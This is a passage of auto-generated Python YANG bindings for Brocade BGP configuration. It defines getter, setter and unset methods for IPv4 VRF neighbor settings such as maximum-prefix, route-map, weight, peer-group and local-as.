self.__filter_list = YANGDynClass(base=filter_list.filter_list, is_container='container', presence=False, yang_name="filter-list", rest_name="filter-list", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'info': u'Establish BGP filters', u'cli-incomplete-no': None, u'cli-incomplete-command': None}}, namespace='urn:brocade.com:mgmt:brocade-bgp', defining_module='brocade-bgp', yang_type='container', is_config=True)
def _get_maximum_prefix(self):
"""
Getter method for maximum_prefix, mapped from YANG variable /routing_system/router/router_bgp/address_family/ipv4/ipv4_unicast/af_vrf/neighbor/af_ipv4_vrf_neighbor_address_holder/af_ipv4_neighbor_addr/maximum_prefix (container)
"""
return self.__maximum_prefix
def _set_maximum_prefix(self, v, load=False):
"""
Setter method for maximum_prefix, mapped from YANG variable /routing_system/router/router_bgp/address_family/ipv4/ipv4_unicast/af_vrf/neighbor/af_ipv4_vrf_neighbor_address_holder/af_ipv4_neighbor_addr/maximum_prefix (container)
If this variable is read-only (config: false) in the
source YANG file, then _set_maximum_prefix is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_maximum_prefix() directly.
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(v,base=maximum_prefix.maximum_prefix, is_container='container', presence=False, yang_name="maximum-prefix", rest_name="maximum-prefix", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'info': u'Maximum number of prefix accept from this peer', u'cli-incomplete-no': None, u'cli-break-sequence-commands': None, u'cli-compact-syntax': None, u'cli-sequence-commands': None, u'cli-incomplete-command': None}}, namespace='urn:brocade.com:mgmt:brocade-bgp', defining_module='brocade-bgp', yang_type='container', is_config=True)
except (TypeError, ValueError):
raise ValueError({
'error-string': """maximum_prefix must be of a type compatible with container""",
'defined-type': "container",
'generated-type': """YANGDynClass(base=maximum_prefix.maximum_prefix, is_container='container', presence=False, yang_name="maximum-prefix", rest_name="maximum-prefix", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'info': u'Maximum number of prefix accept from this peer', u'cli-incomplete-no': None, u'cli-break-sequence-commands': None, u'cli-compact-syntax': None, u'cli-sequence-commands': None, u'cli-incomplete-command': None}}, namespace='urn:brocade.com:mgmt:brocade-bgp', defining_module='brocade-bgp', yang_type='container', is_config=True)""",
})
self.__maximum_prefix = t
if hasattr(self, '_set'):
self._set()
def _unset_maximum_prefix(self):
self.__maximum_prefix = YANGDynClass(base=maximum_prefix.maximum_prefix, is_container='container', presence=False, yang_name="maximum-prefix", rest_name="maximum-prefix", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'info': u'Maximum number of prefix accept from this peer', u'cli-incomplete-no': None, u'cli-break-sequence-commands': None, u'cli-compact-syntax': None, u'cli-sequence-commands': None, u'cli-incomplete-command': None}}, namespace='urn:brocade.com:mgmt:brocade-bgp', defining_module='brocade-bgp', yang_type='container', is_config=True)
def _get_default_originate(self):
"""
Getter method for default_originate, mapped from YANG variable /routing_system/router/router_bgp/address_family/ipv4/ipv4_unicast/af_vrf/neighbor/af_ipv4_vrf_neighbor_address_holder/af_ipv4_neighbor_addr/default_originate (container)
"""
return self.__default_originate
def _set_default_originate(self, v, load=False):
"""
Setter method for default_originate, mapped from YANG variable /routing_system/router/router_bgp/address_family/ipv4/ipv4_unicast/af_vrf/neighbor/af_ipv4_vrf_neighbor_address_holder/af_ipv4_neighbor_addr/default_originate (container)
If this variable is read-only (config: false) in the
source YANG file, then _set_default_originate is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_default_originate() directly.
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(v,base=default_originate.default_originate, is_container='container', presence=False, yang_name="default-originate", rest_name="default-originate", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'cli-compact-syntax': None, u'info': u'Originate default route to peer', u'cli-incomplete-no': None, u'cli-incomplete-command': None}}, namespace='urn:brocade.com:mgmt:brocade-bgp', defining_module='brocade-bgp', yang_type='container', is_config=True)
except (TypeError, ValueError):
raise ValueError({
'error-string': """default_originate must be of a type compatible with container""",
'defined-type': "container",
'generated-type': """YANGDynClass(base=default_originate.default_originate, is_container='container', presence=False, yang_name="default-originate", rest_name="default-originate", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'cli-compact-syntax': None, u'info': u'Originate default route to peer', u'cli-incomplete-no': None, u'cli-incomplete-command': None}}, namespace='urn:brocade.com:mgmt:brocade-bgp', defining_module='brocade-bgp', yang_type='container', is_config=True)""",
})
self.__default_originate = t
if hasattr(self, '_set'):
self._set()
def _unset_default_originate(self):
self.__default_originate = YANGDynClass(base=default_originate.default_originate, is_container='container', presence=False, yang_name="default-originate", rest_name="default-originate", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'cli-compact-syntax': None, u'info': u'Originate default route to peer', u'cli-incomplete-no': None, u'cli-incomplete-command': None}}, namespace='urn:brocade.com:mgmt:brocade-bgp', defining_module='brocade-bgp', yang_type='container', is_config=True)
def _get_prefix_list(self):
"""
Getter method for prefix_list, mapped from YANG variable /routing_system/router/router_bgp/address_family/ipv4/ipv4_unicast/af_vrf/neighbor/af_ipv4_vrf_neighbor_address_holder/af_ipv4_neighbor_addr/prefix_list (container)
YANG Description: either prefix list or distribution-list
"""
return self.__prefix_list
def _set_prefix_list(self, v, load=False):
"""
Setter method for prefix_list, mapped from YANG variable /routing_system/router/router_bgp/address_family/ipv4/ipv4_unicast/af_vrf/neighbor/af_ipv4_vrf_neighbor_address_holder/af_ipv4_neighbor_addr/prefix_list (container)
If this variable is read-only (config: false) in the
source YANG file, then _set_prefix_list is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_prefix_list() directly.
YANG Description: either prefix list or distribution-list
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(v,base=prefix_list.prefix_list, is_container='container', presence=False, yang_name="prefix-list", rest_name="prefix-list", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'info': u'Prefix List for filtering routes', u'cli-incomplete-no': None, u'cli-incomplete-command': None}}, namespace='urn:brocade.com:mgmt:brocade-bgp', defining_module='brocade-bgp', yang_type='container', is_config=True)
except (TypeError, ValueError):
raise ValueError({
'error-string': """prefix_list must be of a type compatible with container""",
'defined-type': "container",
'generated-type': """YANGDynClass(base=prefix_list.prefix_list, is_container='container', presence=False, yang_name="prefix-list", rest_name="prefix-list", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'info': u'Prefix List for filtering routes', u'cli-incomplete-no': None, u'cli-incomplete-command': None}}, namespace='urn:brocade.com:mgmt:brocade-bgp', defining_module='brocade-bgp', yang_type='container', is_config=True)""",
})
self.__prefix_list = t
if hasattr(self, '_set'):
self._set()
def _unset_prefix_list(self):
self.__prefix_list = YANGDynClass(base=prefix_list.prefix_list, is_container='container', presence=False, yang_name="prefix-list", rest_name="prefix-list", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'info': u'Prefix List for filtering routes', u'cli-incomplete-no': None, u'cli-incomplete-command': None}}, namespace='urn:brocade.com:mgmt:brocade-bgp', defining_module='brocade-bgp', yang_type='container', is_config=True)
def _get_neighbor_route_map(self):
"""
Getter method for neighbor_route_map, mapped from YANG variable /routing_system/router/router_bgp/address_family/ipv4/ipv4_unicast/af_vrf/neighbor/af_ipv4_vrf_neighbor_address_holder/af_ipv4_neighbor_addr/neighbor_route_map (container)
"""
return self.__neighbor_route_map
def _set_neighbor_route_map(self, v, load=False):
"""
Setter method for neighbor_route_map, mapped from YANG variable /routing_system/router/router_bgp/address_family/ipv4/ipv4_unicast/af_vrf/neighbor/af_ipv4_vrf_neighbor_address_holder/af_ipv4_neighbor_addr/neighbor_route_map (container)
If this variable is read-only (config: false) in the
source YANG file, then _set_neighbor_route_map is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_neighbor_route_map() directly.
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(v,base=neighbor_route_map.neighbor_route_map, is_container='container', presence=False, yang_name="neighbor-route-map", rest_name="route-map", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'info': u'Apply route map to neighbor', u'alt-name': u'route-map', u'cli-incomplete-no': None, u'cli-incomplete-command': None}}, namespace='urn:brocade.com:mgmt:brocade-bgp', defining_module='brocade-bgp', yang_type='container', is_config=True)
except (TypeError, ValueError):
raise ValueError({
'error-string': """neighbor_route_map must be of a type compatible with container""",
'defined-type': "container",
'generated-type': """YANGDynClass(base=neighbor_route_map.neighbor_route_map, is_container='container', presence=False, yang_name="neighbor-route-map", rest_name="route-map", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'info': u'Apply route map to neighbor', u'alt-name': u'route-map', u'cli-incomplete-no': None, u'cli-incomplete-command': None}}, namespace='urn:brocade.com:mgmt:brocade-bgp', defining_module='brocade-bgp', yang_type='container', is_config=True)""",
})
self.__neighbor_route_map = t
if hasattr(self, '_set'):
self._set()
def _unset_neighbor_route_map(self):
self.__neighbor_route_map = YANGDynClass(base=neighbor_route_map.neighbor_route_map, is_container='container', presence=False, yang_name="neighbor-route-map", rest_name="route-map", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'info': u'Apply route map to neighbor', u'alt-name': u'route-map', u'cli-incomplete-no': None, u'cli-incomplete-command': None}}, namespace='urn:brocade.com:mgmt:brocade-bgp', defining_module='brocade-bgp', yang_type='container', is_config=True)
def _get_route_reflector_client(self):
"""
Getter method for route_reflector_client, mapped from YANG variable /routing_system/router/router_bgp/address_family/ipv4/ipv4_unicast/af_vrf/neighbor/af_ipv4_vrf_neighbor_address_holder/af_ipv4_neighbor_addr/route_reflector_client (empty)
"""
return self.__route_reflector_client
def _set_route_reflector_client(self, v, load=False):
"""
Setter method for route_reflector_client, mapped from YANG variable /routing_system/router/router_bgp/address_family/ipv4/ipv4_unicast/af_vrf/neighbor/af_ipv4_vrf_neighbor_address_holder/af_ipv4_neighbor_addr/route_reflector_client (empty)
If this variable is read-only (config: false) in the
source YANG file, then _set_route_reflector_client is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_route_reflector_client() directly.
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(v,base=YANGBool, is_leaf=True, yang_name="route-reflector-client", rest_name="route-reflector-client", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'info': u'Configure a neighbor as Route Reflector client', u'cli-full-command': None}}, namespace='urn:brocade.com:mgmt:brocade-bgp', defining_module='brocade-bgp', yang_type='empty', is_config=True)
except (TypeError, ValueError):
raise ValueError({
'error-string': """route_reflector_client must be of a type compatible with empty""",
'defined-type': "empty",
'generated-type': """YANGDynClass(base=YANGBool, is_leaf=True, yang_name="route-reflector-client", rest_name="route-reflector-client", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'info': u'Configure a neighbor as Route Reflector client', u'cli-full-command': None}}, namespace='urn:brocade.com:mgmt:brocade-bgp', defining_module='brocade-bgp', yang_type='empty', is_config=True)""",
})
self.__route_reflector_client = t
if hasattr(self, '_set'):
self._set()
def _unset_route_reflector_client(self):
self.__route_reflector_client = YANGDynClass(base=YANGBool, is_leaf=True, yang_name="route-reflector-client", rest_name="route-reflector-client", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'info': u'Configure a neighbor as Route Reflector client', u'cli-full-command': None}}, namespace='urn:brocade.com:mgmt:brocade-bgp', defining_module='brocade-bgp', yang_type='empty', is_config=True)
def _get_unsuppress_map(self):
"""
Getter method for unsuppress_map, mapped from YANG variable /routing_system/router/router_bgp/address_family/ipv4/ipv4_unicast/af_vrf/neighbor/af_ipv4_vrf_neighbor_address_holder/af_ipv4_neighbor_addr/unsuppress_map (container)
"""
return self.__unsuppress_map
def _set_unsuppress_map(self, v, load=False):
"""
Setter method for unsuppress_map, mapped from YANG variable /routing_system/router/router_bgp/address_family/ipv4/ipv4_unicast/af_vrf/neighbor/af_ipv4_vrf_neighbor_address_holder/af_ipv4_neighbor_addr/unsuppress_map (container)
If this variable is read-only (config: false) in the
source YANG file, then _set_unsuppress_map is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_unsuppress_map() directly.
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(v,base=unsuppress_map.unsuppress_map, is_container='container', presence=False, yang_name="unsuppress-map", rest_name="unsuppress-map", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'info': u'Route-map to selectively unsuppress suppressed routes', u'cli-incomplete-no': None, u'cli-incomplete-command': None}}, namespace='urn:brocade.com:mgmt:brocade-bgp', defining_module='brocade-bgp', yang_type='container', is_config=True)
except (TypeError, ValueError):
raise ValueError({
'error-string': """unsuppress_map must be of a type compatible with container""",
'defined-type': "container",
'generated-type': """YANGDynClass(base=unsuppress_map.unsuppress_map, is_container='container', presence=False, yang_name="unsuppress-map", rest_name="unsuppress-map", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'info': u'Route-map to selectively unsuppress suppressed routes', u'cli-incomplete-no': None, u'cli-incomplete-command': None}}, namespace='urn:brocade.com:mgmt:brocade-bgp', defining_module='brocade-bgp', yang_type='container', is_config=True)""",
})
self.__unsuppress_map = t
if hasattr(self, '_set'):
self._set()
def _unset_unsuppress_map(self):
self.__unsuppress_map = YANGDynClass(base=unsuppress_map.unsuppress_map, is_container='container', presence=False, yang_name="unsuppress-map", rest_name="unsuppress-map", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'info': u'Route-map to selectively unsuppress suppressed routes', u'cli-incomplete-no': None, u'cli-incomplete-command': None}}, namespace='urn:brocade.com:mgmt:brocade-bgp', defining_module='brocade-bgp', yang_type='container', is_config=True)
def _get_af_nei_weight(self):
"""
Getter method for af_nei_weight, mapped from YANG variable /routing_system/router/router_bgp/address_family/ipv4/ipv4_unicast/af_vrf/neighbor/af_ipv4_vrf_neighbor_address_holder/af_ipv4_neighbor_addr/af_nei_weight (nei-weight)
"""
return self.__af_nei_weight
def _set_af_nei_weight(self, v, load=False):
"""
Setter method for af_nei_weight, mapped from YANG variable /routing_system/router/router_bgp/address_family/ipv4/ipv4_unicast/af_vrf/neighbor/af_ipv4_vrf_neighbor_address_holder/af_ipv4_neighbor_addr/af_nei_weight (nei-weight)
If this variable is read-only (config: false) in the
source YANG file, then _set_af_nei_weight is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_af_nei_weight() directly.
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(v,base=RestrictedClassType(base_type=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..4294967295']}, int_size=32), restriction_dict={'range': [u'0..65535']}), is_leaf=True, yang_name="af-nei-weight", rest_name="weight", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'info': u'Set default weight for routes from this neighbor', u'cli-full-command': None, u'alt-name': u'weight'}}, namespace='urn:brocade.com:mgmt:brocade-bgp', defining_module='brocade-bgp', yang_type='nei-weight', is_config=True)
except (TypeError, ValueError):
raise ValueError({
'error-string': """af_nei_weight must be of a type compatible with nei-weight""",
'defined-type': "brocade-bgp:nei-weight",
'generated-type': """YANGDynClass(base=RestrictedClassType(base_type=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..4294967295']}, int_size=32), restriction_dict={'range': [u'0..65535']}), is_leaf=True, yang_name="af-nei-weight", rest_name="weight", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'info': u'Set default weight for routes from this neighbor', u'cli-full-command': None, u'alt-name': u'weight'}}, namespace='urn:brocade.com:mgmt:brocade-bgp', defining_module='brocade-bgp', yang_type='nei-weight', is_config=True)""",
})
self.__af_nei_weight = t
if hasattr(self, '_set'):
self._set()
def _unset_af_nei_weight(self):
self.__af_nei_weight = YANGDynClass(base=RestrictedClassType(base_type=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..4294967295']}, int_size=32), restriction_dict={'range': [u'0..65535']}), is_leaf=True, yang_name="af-nei-weight", rest_name="weight", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'info': u'Set default weight for routes from this neighbor', u'cli-full-command': None, u'alt-name': u'weight'}}, namespace='urn:brocade.com:mgmt:brocade-bgp', defining_module='brocade-bgp', yang_type='nei-weight', is_config=True)
def _get_enable_peer_as_check(self):
"""
Getter method for enable_peer_as_check, mapped from YANG variable /routing_system/router/router_bgp/address_family/ipv4/ipv4_unicast/af_vrf/neighbor/af_ipv4_vrf_neighbor_address_holder/af_ipv4_neighbor_addr/enable_peer_as_check (empty)
"""
return self.__enable_peer_as_check
def _set_enable_peer_as_check(self, v, load=False):
"""
Setter method for enable_peer_as_check, mapped from YANG variable /routing_system/router/router_bgp/address_family/ipv4/ipv4_unicast/af_vrf/neighbor/af_ipv4_vrf_neighbor_address_holder/af_ipv4_neighbor_addr/enable_peer_as_check (empty)
If this variable is read-only (config: false) in the
source YANG file, then _set_enable_peer_as_check is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_enable_peer_as_check() directly.
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(v,base=YANGBool, is_leaf=True, yang_name="enable-peer-as-check", rest_name="enable-peer-as-check", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'info': u'Disable routes advertise between peers in same AS', u'cli-full-command': None}}, namespace='urn:brocade.com:mgmt:brocade-bgp', defining_module='brocade-bgp', yang_type='empty', is_config=True)
except (TypeError, ValueError):
raise ValueError({
'error-string': """enable_peer_as_check must be of a type compatible with empty""",
'defined-type': "empty",
'generated-type': """YANGDynClass(base=YANGBool, is_leaf=True, yang_name="enable-peer-as-check", rest_name="enable-peer-as-check", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'info': u'Disable routes advertise between peers in same AS', u'cli-full-command': None}}, namespace='urn:brocade.com:mgmt:brocade-bgp', defining_module='brocade-bgp', yang_type='empty', is_config=True)""",
})
self.__enable_peer_as_check = t
if hasattr(self, '_set'):
self._set()
def _unset_enable_peer_as_check(self):
self.__enable_peer_as_check = YANGDynClass(base=YANGBool, is_leaf=True, yang_name="enable-peer-as-check", rest_name="enable-peer-as-check", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'info': u'Disable routes advertise between peers in same AS', u'cli-full-command': None}}, namespace='urn:brocade.com:mgmt:brocade-bgp', defining_module='brocade-bgp', yang_type='empty', is_config=True)
def _get_additional_paths(self):
"""
Getter method for additional_paths, mapped from YANG variable /routing_system/router/router_bgp/address_family/ipv4/ipv4_unicast/af_vrf/neighbor/af_ipv4_vrf_neighbor_address_holder/af_ipv4_neighbor_addr/additional_paths (container)
"""
return self.__additional_paths
def _set_additional_paths(self, v, load=False):
"""
Setter method for additional_paths, mapped from YANG variable /routing_system/router/router_bgp/address_family/ipv4/ipv4_unicast/af_vrf/neighbor/af_ipv4_vrf_neighbor_address_holder/af_ipv4_neighbor_addr/additional_paths (container)
If this variable is read-only (config: false) in the
source YANG file, then _set_additional_paths is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_additional_paths() directly.
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(v,base=additional_paths.additional_paths, is_container='container', presence=False, yang_name="additional-paths", rest_name="additional-paths", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'info': u'Specify bgp additional paths', u'hidden': u'full', u'cli-incomplete-command': None}}, namespace='urn:brocade.com:mgmt:brocade-bgp', defining_module='brocade-bgp', yang_type='container', is_config=True)
except (TypeError, ValueError):
raise ValueError({
'error-string': """additional_paths must be of a type compatible with container""",
'defined-type': "container",
'generated-type': """YANGDynClass(base=additional_paths.additional_paths, is_container='container', presence=False, yang_name="additional-paths", rest_name="additional-paths", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'info': u'Specify bgp additional paths', u'hidden': u'full', u'cli-incomplete-command': None}}, namespace='urn:brocade.com:mgmt:brocade-bgp', defining_module='brocade-bgp', yang_type='container', is_config=True)""",
})
self.__additional_paths = t
if hasattr(self, '_set'):
self._set()
def _unset_additional_paths(self):
self.__additional_paths = YANGDynClass(base=additional_paths.additional_paths, is_container='container', presence=False, yang_name="additional-paths", rest_name="additional-paths", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'info': u'Specify bgp additional paths', u'hidden': u'full', u'cli-incomplete-command': None}}, namespace='urn:brocade.com:mgmt:brocade-bgp', defining_module='brocade-bgp', yang_type='container', is_config=True)
def _get_associate_peer_group(self):
"""
Getter method for associate_peer_group, mapped from YANG variable /routing_system/router/router_bgp/address_family/ipv4/ipv4_unicast/af_vrf/neighbor/af_ipv4_vrf_neighbor_address_holder/af_ipv4_neighbor_addr/associate_peer_group (bgp-peergroup)
"""
return self.__associate_peer_group
def _set_associate_peer_group(self, v, load=False):
"""
Setter method for associate_peer_group, mapped from YANG variable /routing_system/router/router_bgp/address_family/ipv4/ipv4_unicast/af_vrf/neighbor/af_ipv4_vrf_neighbor_address_holder/af_ipv4_neighbor_addr/associate_peer_group (bgp-peergroup)
If this variable is read-only (config: false) in the
source YANG file, then _set_associate_peer_group is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_associate_peer_group() directly.
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(v,base=RestrictedClassType(base_type=unicode, restriction_dict={'pattern': u'[a-zA-Z]{1}([-a-zA-Z0-9\\\\\\\\@#\\+\\*\\(\\)=\\{~\\}%<>=$_\\[\\]\\|]{0,62})'}), is_leaf=True, yang_name="associate-peer-group", rest_name="peer-group", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'cli-full-command': None, u'info': u'Assign peer-group to neighbor', u'alt-name': u'peer-group'}}, namespace='urn:brocade.com:mgmt:brocade-bgp', defining_module='brocade-bgp', yang_type='bgp-peergroup', is_config=True)
except (TypeError, ValueError):
raise ValueError({
'error-string': """associate_peer_group must be of a type compatible with bgp-peergroup""",
'defined-type': "brocade-bgp:bgp-peergroup",
'generated-type': """YANGDynClass(base=RestrictedClassType(base_type=unicode, restriction_dict={'pattern': u'[a-zA-Z]{1}([-a-zA-Z0-9\\\\\\\\@#\\+\\*\\(\\)=\\{~\\}%<>=$_\\[\\]\\|]{0,62})'}), is_leaf=True, yang_name="associate-peer-group", rest_name="peer-group", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'cli-full-command': None, u'info': u'Assign peer-group to neighbor', u'alt-name': u'peer-group'}}, namespace='urn:brocade.com:mgmt:brocade-bgp', defining_module='brocade-bgp', yang_type='bgp-peergroup', is_config=True)""",
})
self.__associate_peer_group = t
if hasattr(self, '_set'):
self._set()
def _unset_associate_peer_group(self):
self.__associate_peer_group = YANGDynClass(base=RestrictedClassType(base_type=unicode, restriction_dict={'pattern': u'[a-zA-Z]{1}([-a-zA-Z0-9\\\\\\\\@#\\+\\*\\(\\)=\\{~\\}%<>=$_\\[\\]\\|]{0,62})'}), is_leaf=True, yang_name="associate-peer-group", rest_name="peer-group", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'cli-full-command': None, u'info': u'Assign peer-group to neighbor', u'alt-name': u'peer-group'}}, namespace='urn:brocade.com:mgmt:brocade-bgp', defining_module='brocade-bgp', yang_type='bgp-peergroup', is_config=True)
def _get_description(self):
"""
Getter method for description, mapped from YANG variable /routing_system/router/router_bgp/address_family/ipv4/ipv4_unicast/af_vrf/neighbor/af_ipv4_vrf_neighbor_address_holder/af_ipv4_neighbor_addr/description (neighbor-description)
"""
return self.__description
def _set_description(self, v, load=False):
"""
Setter method for description, mapped from YANG variable /routing_system/router/router_bgp/address_family/ipv4/ipv4_unicast/af_vrf/neighbor/af_ipv4_vrf_neighbor_address_holder/af_ipv4_neighbor_addr/description (neighbor-description)
If this variable is read-only (config: false) in the
source YANG file, then _set_description is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_description() directly.
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(v,base=RestrictedClassType(base_type=unicode, restriction_dict={'length': [u'1..220']}), is_leaf=True, yang_name="description", rest_name="description", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'info': u'Neighbor by description', u'cli-multi-value': None}}, namespace='urn:brocade.com:mgmt:brocade-bgp', defining_module='brocade-bgp', yang_type='neighbor-description', is_config=True)
except (TypeError, ValueError):
raise ValueError({
'error-string': """description must be of a type compatible with neighbor-description""",
'defined-type': "brocade-bgp:neighbor-description",
'generated-type': """YANGDynClass(base=RestrictedClassType(base_type=unicode, restriction_dict={'length': [u'1..220']}), is_leaf=True, yang_name="description", rest_name="description", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'info': u'Neighbor by description', u'cli-multi-value': None}}, namespace='urn:brocade.com:mgmt:brocade-bgp', defining_module='brocade-bgp', yang_type='neighbor-description', is_config=True)""",
})
self.__description = t
if hasattr(self, '_set'):
self._set()
def _unset_description(self):
self.__description = YANGDynClass(base=RestrictedClassType(base_type=unicode, restriction_dict={'length': [u'1..220']}), is_leaf=True, yang_name="description", rest_name="description", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'info': u'Neighbor by description', u'cli-multi-value': None}}, namespace='urn:brocade.com:mgmt:brocade-bgp', defining_module='brocade-bgp', yang_type='neighbor-description', is_config=True)
def _get_local_as(self):
"""
Getter method for local_as, mapped from YANG variable /routing_system/router/router_bgp/address_family/ipv4/ipv4_unicast/af_vrf/neighbor/af_ipv4_vrf_neighbor_address_holder/af_ipv4_neighbor_addr/local_as (container)
"""
return self.__local_as
def _set_local_as(self, v, load=False):
"""
Setter method for local_as, mapped from YANG variable /routing_system/router/router_bgp/address_family/ipv4/ipv4_unicast/af_vrf/neighbor/af_ipv4_vrf_neighbor_address_holder/af_ipv4_neighbor_addr/local_as (container)
If this variable is read-only (config: false) in the
source YANG file, then _set_local_as is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_local_as() directly.
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(v,base=local_as.local_as, is_container='container', presence=False, yang_name="local-as", rest_name="local-as", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'info': u'Assign local-as number to neighbor', u'cli-compact-syntax': None, u'cli-sequence-commands': None, u'cli-break-sequence-commands': None}}, namespace='urn:brocade.com:mgmt:brocade-bgp', defining_module='brocade-bgp', yang_type='container', is_config=True)
except (TypeError, ValueError):
raise ValueError({
'error-string': """local_as must be of a type compatible with container""",
'defined-type': "container",
'generated-type': """YANGDynClass(base=local_as.local_as, is_container='container', presence=False, yang_name="local-as", rest_name="local-as", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'info': u'Assign local-as number to neighbor', u'cli-compact-syntax': None, u'cli-sequence-commands': None, u'cli-break-sequence-commands': None}}, namespace='urn:brocade.com:mgmt:brocade-bgp', defining_module='brocade-bgp', yang_type='container', is_config=True)""",
})
self.__local_as = t
if hasattr(self, '_set'):
self._set()
def _unset_local_as(self):
self.__local_as = YANGDynClass(base=local_as.local_as, is_container='container', presence=False, yang_name="local-as", rest_name="local-as", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'info': u'Assign local-as number to neighbor', u'cli-compact-syntax': None, u'cli-sequence-commands': None, u'cli-break-sequence-commands': None}}, namespace='urn:brocade.com:mgmt:brocade-bgp', defining_module='brocade-bgp', yang_type='container', is_config=True)
def _get_next_hop_self(self):
"""
Getter method for next_hop_self, mapped from YANG variable /routing_system/router/router_bgp/address_family/ipv4/ipv4_unicast/af_vrf/neighbor/af_ipv4_vrf_neighbor_address_holder/af_ipv4_neighbor_addr/next_hop_self (container)
"""
return self.__next_hop_self
def _set_next_hop_self(self, v, load=False):
"""
Setter method for next_hop_self, mapped from YANG variable /routing_system/router/router_bgp/address_family/ipv4/ipv4_unicast/af_vrf/neighbor/af_ipv4_vrf_neighbor_address_holder/af_ipv4_neighbor_addr/next_hop_self (container)
If this variable is read-only (config: false) in the
source YANG file, then _set_next_hop_self is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_next_hop_self() directly.
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
